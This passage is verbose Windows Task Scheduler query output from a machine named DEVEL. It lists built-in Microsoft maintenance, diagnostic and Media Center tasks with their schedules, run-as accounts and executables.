Start In:                             N/A
Comment:                              This task defragments the computers hard disk drives.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 3 minutes, If Not Idle Retry For 10080 minutes Stop the task if Idle State end
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2005
End Date:                             N/A
Days:                                 WED
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Diagnosis
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Diagnosis\Scheduled
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 5:45:40
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              The Windows Scheduled Maintenance Task performs periodic maintenance of the computer system by fixing problems automatically or reporting them through the Action Center.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 480 minutes
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          INTERACTIVE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2004
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\DiskDiagnostic
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector
Next Run Time:                        22/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 5:57:06
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
Start In:                             N/A
Comment:                              The Windows Disk Diagnostic reports general disk and system information to Microsoft for users participating in the Customer Experience Program.
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for  minutes, If Not Idle Retry For  minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2004
End Date:                             N/A
Days:                                 SUN
Months:                               Every 2 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\DFDWiz.exe
Start In:                             N/A
Comment:                              The Microsoft-Windows-DiskDiagnosticResolver warns users about faults reported by hard disks that support the Self Monitoring and Reporting Technology (S.M.A.R.T.) standard. This task is triggered automatically by the Diagnostic Policy Service when a S.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Location
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Location\Notifications
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %windir%\System32\LocationNotifications.exe
Start In:                             N/A
Comment:                              Location Activity
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Maintenance
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Maintenance\WinSAT
Next Run Time:                        15/9/2019 1:00:00
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        17/3/2017 11:49:04
Last Result:                          0
Author:                               Microsoft
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Measures a system's performance and capabilities
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for  minutes, If Not Idle Retry For  minutes Stop the task if Idle State end
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          Administrators
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Weekly
Start Time:                           1:00:00
Start Date:                           1/1/2008
End Date:                             N/A
Days:                                 SUN
Months:                               Every 1 week(s)
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

Folder: \Microsoft\Windows\Media Center
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ActivateWindowsSearch
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoActivateWindowsSearch
Start In:                             N/A
Comment:                              Privileged Media Center Search Reindexing job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ConfigureInternetTimeService
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService
Start In:                             N/A
Comment:                              Privileged Media Center Time Update Service setting job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\DispatchRecoveryTasks
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Recovery Task Dispatcher job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ehDRMInit
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DRMInit
Start In:                             N/A
Comment:                              Privileged Media Center DRM initialization job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          LOCAL SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\InstallPlayReady
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center PlayReady install job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\mcupdate
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\mcupdate $(Arg0)
Start In:                             N/A
Comment:                              Check for Media Center updates.
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\MediaCenterRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Media Center Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Object Store Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\OCURActivate
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /OCURActivate
Start In:                             N/A
Comment:                              Privileged Media Center OCUR activation job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\OCURDiscovery
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscovery
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscoveryW1
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PBDADiscoveryW2
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery
Start In:                             N/A
Comment:                              Privileged Media Center OCUR discovery job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PeriodicScanRetry
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %windir%\ehome\MCUpdate.exe -pscn 0
Start In:                             N/A
Comment:                              Background periodic scanner - PeriodicScanRetry
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        One Time Only
Start Time:                           5:33:00
Start Date:                           9/9/2006
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PvrRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Pvr Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\PvrScheduleTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform PVR Scheduling activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\RecordingRestart
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehrec /RestartRecording
Start In:                             N/A
Comment:                              Restarts recordings after a power failure.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\RegisterSearch
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Search registration job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\ReindexSearchRoot
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoReindexSearchRoot
Start In:                             N/A
Comment:                              Privileged Media Center Search Reindexing job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\SqlLiteRecoveryTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          Multiple actions
Start In:                             Multiple actions
Comment:                              Perform Data Recovery activities
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          NETWORK SERVICE
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Media Center\UpdateRecordPath
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          %SystemRoot%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0)
Start In:                             N/A
Comment:                              Privileged Media Center Recorder Permission setting job
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MemoryDiagnostic
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Task for launching the Memory Diagnostic
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Task for launching the Memory Diagnostic
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MobilePC
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MobilePC\HotStart
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              Launches applications configured for Windows HotStart
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Authenticated Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\MUI
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\MUI\LPRemove
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        13/9/2019 6:16:07
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          %windir%\system32\lpremove.exe
Start In:                             N/A
Comment:                              Launch language cleanup tool
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 10 minutes, If Not Idle Retry For 10 minutes Stop the task if Idle State end
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 09:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Multimedia
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Multimedia\SystemSoundsService
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        28/12/2017 2:44:24
Last Result:                          0
Author:                               N/A
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              System Sounds User Mode Agent
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\NetTrace
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\NetTrace\GatherNetworkInfo
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft
Task To Run:                          %windir%\system32\gatherNetworkInfo.vbs
Start In:                             $(Arg1)
Comment:                              Network information collector
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode
Run As User:                          Users
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        On demand only
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows\Offline Files
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\Offline Files\Background Synchronization
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               Microsoft Corporation
Task To Run:                          COM handler
